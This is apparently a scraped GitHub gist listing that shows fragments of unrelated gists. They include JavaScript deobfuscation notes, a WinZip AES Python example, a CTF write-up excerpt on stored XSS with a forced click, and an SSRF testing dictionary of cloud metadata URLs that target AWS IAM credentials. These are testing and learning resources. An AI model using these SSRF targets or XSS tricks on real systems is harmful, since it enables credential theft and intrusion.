0xdevalias
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active
November 16, 2024 05:33
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
danifus
/ create_aes_zip.py
Created
July 27, 2019 03:18
Implementing Winzip AES encryption / decryption with zipfile refactor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import zipfile | |
| import zipfile_aes | |
| secret_password = b'lost art of keeping a secret' | |
| with zipfile_aes.AESZipFile('new_test.zip', | |
| 'w', | |
| compression=zipfile.ZIP_LZMA, | |
| encryption=zipfile_aes.WZ_AES) as zf: | |
| zf.setpassword(secret_password) |
Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:
- Stored XSS on user profile page.
It's also possible to make victim browser trigger a click on injected element
if(location.hash.slice(1) == 'report'){
document.getElementById('report-btn').click();
BuffaloWill
/ cloud_metadata.txt
Last active
September 30, 2024 02:53
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |